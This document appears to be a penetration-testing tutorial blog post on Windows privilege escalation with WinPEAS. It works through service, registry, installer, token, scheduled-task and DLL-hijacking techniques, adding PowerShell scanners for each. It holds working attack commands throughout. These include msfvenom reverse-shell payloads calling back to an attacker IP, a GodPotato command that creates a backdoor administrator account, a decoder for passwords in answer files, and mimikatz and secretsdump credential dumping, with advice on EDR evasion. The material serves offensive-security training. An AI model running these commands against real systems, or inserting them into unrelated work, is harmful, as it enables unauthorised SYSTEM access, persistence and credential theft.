Ethical Hacking #windows#privilege-escalation#winpeas

Windows Privilege Escalation Guide with WinPEAS

Learn Windows privilege escalation techniques using WinPEAS, from weak service permissions to unquoted paths and token impersonation attacks.

7 min read

Privilege escalation on Windows is the art of moving from a low-privileged user account to SYSTEM or Administrator. It’s a critical phase of every penetration test and one of the skills that separates junior from senior operators. Windows has a rich attack surface for privilege escalation — misconfigured services, weak ACLs, unquoted paths, token abuse, and credential reuse are all common findings in real engagements. This guide covers the key techniques and the automation tool that finds them: WinPEAS.

Setting Up: WinPEAS

WinPEAS (Windows Privilege Escalation Awesome Script) is the Windows equivalent of LinPEAS. Download it from the PEASS-ng GitHub repository. The stock binary is well known to Defender and most EDR products, so expect it to be quarantined on a monitored host; the releases page also carries obfuscated builds for that case:

# Download to target (if outbound web access is available)
Invoke-WebRequest -Uri "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe" -OutFile winPEAS.exe

# Or transfer from your Kali machine via a Python HTTP server
# Kali: python3 -m http.server 8080
# Target: Invoke-WebRequest -Uri "http://10.10.10.1:8080/winPEASx64.exe" -OutFile winPEAS.exe

Run it. ANSI colours are on by default (winPEAS enables virtual-terminal support in the console for you); pass notcolor if your shell prints raw escape sequences instead:

winPEAS.exe
winPEAS.exe quiet               # Suppress banner
winPEAS.exe systeminfo          # Only system info checks
winPEAS.exe servicesinfo        # Only service checks

WinPEAS runs hundreds of checks and prints a colour legend at the top of its output: anything highlighted in red is a probable escalation vector and should be investigated first, while green and cyan output is context (well-configured items, users, groups). The output runs to thousands of lines, so redirect it to a file and read it in sections rather than scrolling a terminal.

Technique 1: Unquoted Service Paths

When a service's executable path contains spaces and is not wrapped in quotes, CreateProcess (called by the Service Control Manager) cannot tell where the executable name ends and its arguments begin, so it tries successive prefixes: it stops at each space, appends .exe, and attempts to run that. If one of those earlier prefixes lands in a directory you can write to, a binary you plant there runs instead of the real service.

Identify vulnerable services:

wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

Or with PowerShell:

Get-CimInstance Win32_Service | Where-Object {
  $_.PathName -notmatch '"' -and $_.PathName -match ' ' -and $_.StartMode -eq 'Auto' -and $_.PathName -notmatch '^C:\\Windows\\'
} | Select-Object Name, StartName, PathName

Example vulnerable path:

C:\Program Files\Vulnerable App\service.exe

Windows tries to execute:

  1. C:\Program.exe
  2. C:\Program Files\Vulnerable.exe
  3. C:\Program Files\Vulnerable App\service.exe

If you can write to C:\Program Files\, drop a malicious Vulnerable.exe there; it runs in the service's account (check StartName; LocalSystem is the goal) the next time the service starts. By default only administrators can write to C:\Program Files, so this mostly bites third-party software installed to custom paths or with loosened ACLs. To trigger it, restart the service if you hold SERVICE_STOP and SERVICE_START on it; otherwise, for an auto-start service, a reboot does the job if you hold SeShutdownPrivilege.

Generate a payload with msfvenom. Use the exe-service format: it wraps the payload in a minimal service executable that answers the Service Control Manager, so the process is not killed after the 30-second start timeout (error 1053) the way a plain exe is:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f exe-service -o Vulnerable.exe
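The one-liners above only list suspicious paths. As an added example that is not part of the article or of WinPEAS, the PowerShell below also derives the candidate binaries CreateProcess would try and probes whether the current user can write to each candidate's directory, which is the question that decides exploitability. It assumes PowerShell 3 or later for Get-CimInstance; the function names are my own.

```powershell
# Added example, not from WinPEAS or the article: list services with unquoted,
# space-containing paths, work out which shortened binaries CreateProcess will try
# before the real one, and probe whether the current user can write to each
# candidate's directory. Needs PowerShell 3+ (Get-CimInstance).

function Test-DirectoryWritable {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Container)) { return $false }
    # Authoritative check: create and immediately delete a uniquely named empty file.
    # (Reading the ACL would require resolving the token's groups; a probe asks the kernel.)
    $probe = Join-Path -Path $Path -ChildPath ([System.IO.Path]::GetRandomFileName())
    try {
        [System.IO.File]::Create($probe).Dispose()
        Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
        return $true
    } catch {
        return $false
    }
}

function Get-UnquotedServicePathTargets {
    Get-CimInstance -ClassName Win32_Service |
    Where-Object {
        $_.PathName -and
        $_.PathName -notmatch '^\s*"' -and          # path is not quoted
        $_.PathName -match ' ' -and                 # and contains at least one space
        $_.PathName -notmatch '^C:\\Windows\\'      # skip Windows-owned binaries (noise)
    } |
    ForEach-Object {
        $svc = $_
        # Drop any arguments after the executable; only the path up to ".exe" is
        # subject to the prefix-splitting behaviour.
        $exePath = $svc.PathName
        if ($exePath -match '^(?<exe>.*?\.exe)(\s|$)') { $exePath = $Matches.exe }
        $parts = $exePath -split ' '
        # CreateProcess tries each prefix that ends at a space, with ".exe" appended:
        #   C:\Program.exe, C:\Program Files\Vulnerable.exe, ... and finally the real file.
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            [pscustomobject]@{
                Service     = $svc.Name
                RunsAs      = $svc.StartName
                StartMode   = $svc.StartMode
                Candidate   = $candidate
                DirWritable = Test-DirectoryWritable -Path (Split-Path -Path $candidate -Parent)
            }
        }
    }
}

# Only rows where the directory is writable are exploitable; RunsAs tells you what
# you gain (LocalSystem is the jackpot) and StartMode whether a reboot will trigger it.
Get-UnquotedServicePathTargets | Where-Object DirWritable | Format-Table -AutoSize
```

The probe approach deliberately creates and deletes a zero-byte file; on an engagement where even that is unacceptable, swap Test-DirectoryWritable for an ACL read, at the cost of having to resolve the token's group list yourself.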

Technique 2: Weak Service Permissions

If you have permission to modify a service’s binary path, you can point it to your payload.

Check service permissions with AccessChk (Sysinternals; bring a copy to the target). Without tooling, sc.exe sdshow <service> prints the service's security descriptor as SDDL that you can read by hand:

accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula
accesschk.exe -uwcqv "Authenticated Users" * /accepteula

Look for services where low-privileged principals (your user, its groups, Authenticated Users, Everyone) hold SERVICE_CHANGE_CONFIG, SERVICE_ALL_ACCESS, WRITE_DAC or WRITE_OWNER.

Exploit with sc.exe (always call it as sc.exe: inside PowerShell, sc alone is an alias for Set-Content, and the space after binPath= is mandatory):

sc.exe config VulnerableService binPath= "C:\Users\user\AppData\Local\Temp\shell.exe"
sc.exe stop VulnerableService
sc.exe start VulnerableService

Stopping and starting need SERVICE_STOP and SERVICE_START; without them, an auto-start service picks up the new path on the next reboot. A plain reverse-shell executable is terminated by the Service Control Manager after roughly 30 seconds because it never reports itself as running, so either build the payload with msfvenom's exe-service format or point binPath= at a one-shot command (such as adding your user to the local Administrators group) that finishes before the timeout matters.

Technique 3: Weak Registry ACLs on Services

Service configuration is stored in HKLM\SYSTEM\CurrentControlSet\Services\. If a low-privileged user has write access to a service’s registry key, they can modify ImagePath to point to a payload.

# Check registry ACLs (the Access property lists each ACE; look for SetValue, WriteKey or FullControl granted to your user or its groups)
(Get-Acl "HKLM:\SYSTEM\CurrentControlSet\Services\VulnerableService").Access | Format-List

Exploit (the new ImagePath is read the next time the service starts, so restart it or reboot exactly as for Technique 2):

reg add "HKLM\SYSTEM\CurrentControlSet\Services\VulnerableService" /v ImagePath /t REG_EXPAND_SZ /d "C:\shell.exe" /f
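Reading one key's ACL at a time does not scale across several hundred services. The following added PowerShell (not from WinPEAS or the article) walks every service key, resolves each Allow ACE to a SID and compares it with the SIDs in the current token, so it reports exactly the keys whose ImagePath can be rewritten from this shell. Function and column names are assumptions of this example; explicit Deny ACEs are not evaluated, so confirm a hit with the reg add itself.

```powershell
# Added example, not from WinPEAS or the article: find service registry keys the
# current token can modify. ACEs are resolved to SIDs and compared against the
# token's own user and group SIDs, so group display names and locale do not matter.
# Only Allow ACEs are considered; an explicit Deny on the same key would still win.

function Get-WritableServiceRegistryKeys {
    $identity = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    # Every SID the token carries: the user itself plus all group memberships
    $tokenSids = @($identity.User.Value) + @($identity.Groups | ForEach-Object { $_.Value })

    # Rights that let you change ImagePath, or grant yourself the right to
    $writeMask = [System.Security.AccessControl.RegistryRights]::SetValue -bor
                 [System.Security.AccessControl.RegistryRights]::CreateSubKey -bor
                 [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
                 [System.Security.AccessControl.RegistryRights]::TakeOwnership

    Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $key = $_
        try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop } catch { return }
        # SID-typed rules: no dependence on display names
        $rules = $acl.GetAccessRules($true, $true, [System.Security.Principal.SecurityIdentifier])
        foreach ($rule in $rules) {
            if ($rule.AccessControlType -ne [System.Security.AccessControl.AccessControlType]::Allow) { continue }
            if ($tokenSids -notcontains $rule.IdentityReference.Value) { continue }
            if (([int]$rule.RegistryRights -band [int]$writeMask) -eq 0) { continue }

            $principal = try { $rule.IdentityReference.Translate([System.Security.Principal.NTAccount]).Value }
                         catch { $rule.IdentityReference.Value }
            [pscustomobject]@{
                Service   = $key.PSChildName
                Principal = $principal
                Rights    = $rule.RegistryRights.ToString()
                # ObjectName is the account the service runs as; ImagePath is what you would overwrite
                RunsAs    = (Get-ItemProperty -Path $key.PSPath -Name ObjectName -ErrorAction SilentlyContinue).ObjectName
                ImagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
            }
        }
    }
}

Get-WritableServiceRegistryKeys | Format-Table -AutoSize
```

A hit with RunsAs of LocalSystem is the one to exploit; after rewriting ImagePath the service still has to be restarted, so check you also hold start/stop rights on it or that it is auto-start and you can reboot.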

Technique 4: AlwaysInstallElevated

If the AlwaysInstallElevated value is set to 1 under both of these keys, Windows Installer runs any MSI a user installs with SYSTEM privileges:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If both return 0x1:

# Generate a malicious MSI
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f msi -o shell.msi
# Install it on the target
msiexec /quiet /qn /i shell.msi

Technique 5: Token Impersonation (Potato Attacks)

Windows represents a security context as an access token. Two privileges, SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege, let a process adopt another user's token, including SYSTEM's, once it can get that user to connect to something it controls; the potato family of tools exists to coerce exactly that connection.

These privileges are granted by default to service accounts such as those running IIS application pools and MSSQL, and to the built-in NETWORK SERVICE and LOCAL SERVICE accounts. If you land a shell as one of them (a web shell is the classic case), you very likely have impersonation rights.

Check your current privileges. A privilege listed as Disabled is still held by the token (the tools enable it themselves), so what matters is that it appears at all:

whoami /priv

Exploit with PrintSpoofer (Windows 10 and Server 2016/2019; it needs the Print Spooler service running, which it is by default, and -i gives you an interactive process):

PrintSpoofer.exe -i -c cmd.exe

Exploit with GodPotato (covers Windows 8 through 11 and Server 2012 through 2022; pick the build that matches the target's installed .NET runtime, as separate binaries are published for .NET 2, 3.5 and 4):

GodPotato.exe -cmd "cmd /c whoami"
GodPotato.exe -cmd "cmd /c net user hacker Password123! /add && net localgroup administrators hacker /add"

Exploit with RoguePotato or SweetPotato where those fit the target build. Each tool's README and the potato page on HackTricks (maintained by the PEASS-ng author) track which variant works on which Windows version.

Technique 6: Stored Credentials

WinPEAS automatically checks for stored credentials. Do it manually too:

# Saved Windows credentials
cmdkey /list

# Use stored credentials (runas opens a new window; from a non-interactive shell, launch a reverse-shell binary instead of cmd.exe)
runas /savecred /user:DOMAIN\Administrator cmd.exe

# Autologon credentials in registry
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

# Unattend.xml files (post-deployment cleanup failures)
dir /s /b C:\*.xml 2>nul | findstr /i "unattend sysprep"

Configuration files, scripts, and log files frequently contain hardcoded credentials. The usual answer-file leftovers live under C:\Windows\Panther\ and C:\Windows\System32\Sysprep\, and the password values in them are typically only Base64-encoded, not encrypted. WinPEAS searches the common locations automatically.
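To make the manual checks above concrete, here is an added PowerShell example (mine, not WinPEAS's or the article's) that reads the Winlogon autologon values and decodes passwords from leftover answer files. It relies on a documented Windows Setup detail: when PlainText is false, the Value element holds the Base64 of the UTF-16LE string formed by the password with the literal word "Password" appended. The answer-file path list and the embedded sample XML (which encodes the constructed password P@ssw0rd!) are assumptions of the example.

```powershell
# Added example, not from WinPEAS or the article: pull autologon values from the
# Winlogon key and decode passwords from leftover unattend/sysprep answer files.
# Windows Setup's encoded form is Base64( UTF-16LE( password + "Password" ) ).

# Well-known answer-file locations left behind by imaging (assumed list; extend as needed)
$AnswerFilePaths = @(
    'C:\unattend.xml',
    'C:\Windows\Panther\Unattend.xml',
    'C:\Windows\Panther\Unattend\Unattend.xml',
    'C:\Windows\System32\Sysprep\sysprep.xml',
    'C:\Windows\System32\Sysprep\Unattend.xml'
)

function Get-AutologonCredential {
    $wl = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -ErrorAction SilentlyContinue
    if ($wl -and $wl.DefaultPassword) {
        [pscustomobject]@{
            Source   = 'Winlogon'
            Domain   = $wl.DefaultDomainName
            User     = $wl.DefaultUserName
            Password = $wl.DefaultPassword
            Enabled  = ($wl.AutoAdminLogon -eq '1')
        }
    }
    # If AutoAdminLogon is 1 but DefaultPassword is absent, the password sits in the
    # LSA secret named DefaultPassword, which is only readable as SYSTEM.
}

function ConvertFrom-UnattendPassword {
    param([Parameter(Mandatory)][string]$Value, [bool]$PlainText)
    if ($PlainText) { return $Value }
    $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($Value))
    # Setup appends the literal string "Password" before encoding; strip it again
    return ($decoded -replace 'Password$', '')
}

function Get-UnattendCredential {
    param([Parameter(Mandatory)][xml]$Document, [string]$Source = '<inline>')
    # local-name() sidesteps the urn:schemas-microsoft-com:unattend namespace
    $nodes = $Document.SelectNodes("//*[local-name()='Password' or local-name()='AdministratorPassword']")
    foreach ($node in $nodes) {
        $valueNode = $node.SelectSingleNode("*[local-name()='Value']")
        if (-not $valueNode) { continue }
        $plainNode = $node.SelectSingleNode("*[local-name()='PlainText']")
        $isPlain   = (-not $plainNode) -or ($plainNode.InnerText -eq 'true')
        # AutoLogon carries <Username>, LocalAccount carries <Name>, UserAccounts carries neither
        $userNode  = $node.ParentNode.SelectSingleNode("*[local-name()='Username' or local-name()='Name']")
        $userName  = $null
        if ($userNode) { $userName = $userNode.InnerText }
        [pscustomobject]@{
            Source   = $Source
            Element  = $node.LocalName
            User     = $userName
            Password = ConvertFrom-UnattendPassword -Value $valueNode.InnerText -PlainText $isPlain
        }
    }
}

function Find-UnattendCredential {
    foreach ($path in $AnswerFilePaths) {
        if (Test-Path -LiteralPath $path) {
            try { Get-UnattendCredential -Document ([xml](Get-Content -LiteralPath $path -Raw)) -Source $path }
            catch { Write-Warning "Could not parse $path : $_" }
        }
    }
}

# Constructed sample (not from a real host): an AutoLogon block holding the encoded
# form of "P@ssw0rd!"; decoding it exercises the Base64 and suffix handling above.
$sampleUnattend = [xml]@'
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <AutoLogon>
        <Password><Value>UABAAHMAcwB3ADAAcgBkACEAUABhAHMAcwB3AG8AcgBkAA==</Value><PlainText>false</PlainText></Password>
        <Enabled>true</Enabled>
        <Username>Administrator</Username>
      </AutoLogon>
    </component>
  </settings>
</unattend>
'@

Get-UnattendCredential -Document $sampleUnattend -Source 'sample'
Get-AutologonCredential
Find-UnattendCredential
```

Run the last two calls on the target; the sample call exists so you can confirm the decoder on your own machine first.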

Technique 7: Scheduled Tasks

Scheduled tasks that run as SYSTEM (or with highest privileges) and execute a binary or script the current user can modify are prime escalation targets. A low-privileged user only sees tasks whose security descriptor allows reading, so this listing is never complete:

Get-ScheduledTask | Where-Object { $_.Principal.UserId -match 'SYSTEM' -or $_.Principal.RunLevel -eq 'Highest' } |
  Select-Object TaskName, TaskPath, @{n='RunsAs';e={$_.Principal.UserId}}, @{n='Execute';e={$_.Actions.Execute}}

For each interesting task, check the permissions on the file it runs, and on any script passed in its arguments:

icacls "C:\path\to\scheduled\task.exe"

If BUILTIN\Users, Authenticated Users, Everyone, or your own account appears with (F), (M) or (W), you can overwrite the file; the payload then runs in the task's context the next time its trigger fires.
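The following added PowerShell (not from WinPEAS or the article) automates both steps: it lists tasks that run as SYSTEM or with highest privileges, resolves the executable and any script path in the arguments, and tests whether the current user could open each for writing. Opening a file for write access without writing anything is a non-destructive way to ask the kernel about the effective ACL. Helper and column names are assumptions of this example.

```powershell
# Added example, not from WinPEAS or the article: enumerate privileged scheduled
# tasks, resolve what they execute (including scripts named in the arguments), and
# test whether the current user can open those files for writing.

function Test-FileWritable {
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Leaf)) { return $false }
    try {
        # Write access is requested but nothing is written; the file is untouched
        $fs = [System.IO.File]::Open($Path, [System.IO.FileMode]::Open,
                                     [System.IO.FileAccess]::Write, [System.IO.FileShare]::ReadWrite)
        $fs.Dispose()
        return $true
    } catch {
        return $false
    }
}

function Resolve-TaskTarget {
    # Expand %SystemRoot%-style variables, strip quotes, and resolve bare names via PATH
    param([Parameter(Mandatory)][string]$Target)
    $t = [System.Environment]::ExpandEnvironmentVariables($Target.Trim('"'))
    if (-not (Split-Path -Path $t -Parent)) {
        $cmd = Get-Command -Name $t -ErrorAction SilentlyContinue
        if ($cmd -and $cmd.Source) { $t = $cmd.Source }
    }
    return $t
}

function Get-PrivilegedTaskTargets {
    Get-ScheduledTask -ErrorAction SilentlyContinue |
    Where-Object {
        $_.State -ne 'Disabled' -and
        ($_.Principal.UserId -match 'SYSTEM' -or $_.Principal.RunLevel -eq 'Highest')
    } |
    ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            if (-not $action.Execute) { continue }   # COM-handler actions have no Execute
            $targets = @(Resolve-TaskTarget -Target $action.Execute)
            # Scripts passed as arguments (powershell -File x.ps1, cmd /c y.bat, ...) are
            # just as good a target as the executable itself.
            if ($action.Arguments) {
                $argString = [System.Environment]::ExpandEnvironmentVariables($action.Arguments)
                foreach ($m in [regex]::Matches($argString, '[A-Za-z]:\\[^\s"]+\.(ps1|bat|cmd|vbs|js)')) {
                    $targets += Resolve-TaskTarget -Target $m.Value
                }
            }
            foreach ($t in $targets) {
                [pscustomobject]@{
                    Task     = $task.TaskPath + $task.TaskName
                    RunsAs   = $task.Principal.UserId
                    Target   = $t
                    Writable = Test-FileWritable -Path $t
                }
            }
        }
    }
}

# Anything Writable can be replaced with your payload and runs as RunsAs the next
# time the trigger fires; Get-ScheduledTaskInfo shows LastRunTime and NextRunTime.
Get-PrivilegedTaskTargets | Where-Object Writable | Format-Table -AutoSize
```

The file check only answers "can I modify this file". A task whose target is missing but whose directory is writable is also exploitable (create the file), so pair this with a directory check on any Target that does not exist.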

Technique 8: DLL Hijacking

When a program loads a DLL by name rather than by full path, Windows walks a fixed search order: the application's own directory, the system directories, then the directories in PATH. If the DLL is missing from every location, or you can write to a directory that is searched before the one where it actually lives, your DLL is loaded instead. For this to escalate privilege the loading process must run as a more privileged account, typically a service running as SYSTEM. DLLs on the KnownDLLs list are always loaded from System32 and cannot be hijacked this way.

Find candidates with Process Monitor (Sysinternals): filter on Operation is CreateFile, Result is NAME NOT FOUND and Path ends with .dll, then look for writable directories among the paths. Procmon itself needs administrator rights because it loads a kernel driver, so run this analysis against a copy of the software in a lab and confirm directory permissions on the real target with icacls.

# Generate a malicious DLL
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.1 LPORT=4444 -f dll -o hijack.dll

Rename it to the expected DLL name and drop it in the writable directory. The payload runs from DllMain as soon as the process loads it, so match the architecture of the target process (a 32-bit process will not load a 64-bit DLL), and expect the host process to crash afterwards if it needed exports your DLL does not provide.
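Sifting a Procmon capture by hand is tedious. The PowerShell below is an added example (not from the article or WinPEAS) that parses a CSV export with Procmon's default columns and reports, per process and DLL name, the directories that were searched in order; the embedded CSV is a constructed sample and the function name is an assumption of the example. Feed the directories to icacls to find the first one you can write to, since the first writable directory in that order is where a planted DLL wins.

```powershell
# Added example, not from WinPEAS or the article: parse a Process Monitor CSV export
# (File > Save > CSV, default columns) and list, per process and DLL, the directories
# the loader tried in order before giving up.

function Get-DllHijackCandidates {
    # $Rows come from Import-Csv (a real export) or ConvertFrom-Csv (the sample below)
    param([Parameter(Mandatory)][object[]]$Rows)

    $misses = $Rows | Where-Object {
        $_.Operation -eq 'CreateFile' -and
        $_.Result -eq 'NAME NOT FOUND' -and
        $_.Path -match '\.dll$'
    }
    # Group by process + DLL name. Export order is chronological, which is exactly the
    # order the loader walked the search path, so each group preserves it.
    $misses | Group-Object -Property { $_.'Process Name' + '|' + (Split-Path -Path $_.Path -Leaf) } |
    ForEach-Object {
        $first = $_.Group[0]
        [pscustomobject]@{
            Process     = $first.'Process Name'
            Dll         = Split-Path -Path $first.Path -Leaf
            SearchOrder = @($_.Group | ForEach-Object { Split-Path -Path $_.Path -Parent } | Select-Object -Unique)
        }
    }
}

# Constructed sample export (not a real capture): a service binary asks for a DLL that
# exists nowhere, so every directory in the search order is tried and logged.
$sampleCsv = @'
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:01:02.1","VulnSvc.exe","1234","CreateFile","C:\Program Files\Vulnerable App\helper.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.2","VulnSvc.exe","1234","CreateFile","C:\Windows\System32\helper.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.3","VulnSvc.exe","1234","CreateFile","C:\Windows\System\helper.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.4","VulnSvc.exe","1234","CreateFile","C:\Windows\helper.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.5","VulnSvc.exe","1234","CreateFile","C:\Users\user\AppData\Local\Temp\helper.dll","NAME NOT FOUND","Desired Access: Read Attributes"
"10:01:02.6","VulnSvc.exe","1234","CreateFile","C:\Windows\System32\kernel32.dll","SUCCESS","Desired Access: Read"
'@

Get-DllHijackCandidates -Rows (ConvertFrom-Csv $sampleCsv) | ForEach-Object {
    "{0} wants {1}; search order:" -f $_.Process, $_.Dll
    $_.SearchOrder | ForEach-Object { "    $_" }
}
# Real capture: Get-DllHijackCandidates -Rows (Import-Csv C:\captures\Logfile.CSV)
```

In the sample, a user-writable Temp directory appears last, which is the common real-world outcome: the application directory is usually the only early entry you can influence, and only when the installer left it writable.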

Post-Exploitation: Extracting Credentials

Once you have SYSTEM, dump credentials for persistence and lateral movement. On hardened hosts expect LSA Protection (RunAsPPL), Credential Guard, and Defender signatures for mimikatz to get in the way of the in-memory dump:

# Mimikatz
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "lsadump::sam" exit

# Impacket secretsdump (remote, from Kali, where it is packaged as impacket-secretsdump; quote the target string if the password has shell metacharacters)
python3 secretsdump.py CORP/Administrator:Password123@192.168.1.10

Conclusion

Windows privilege escalation rarely requires a zero-day. Real environments are full of misconfigurations — unquoted paths, overpermissioned services, stored credentials, and impersonation rights on service accounts. WinPEAS automates the discovery phase, but understanding what each finding means and how to exploit it separates a tool user from a skilled operator. Practice these techniques on platforms like HackTheBox, TryHackMe, and dedicated Windows privesc labs to build muscle memory before your next engagement.

#pentesting #winpeas #privilege-escalation #windows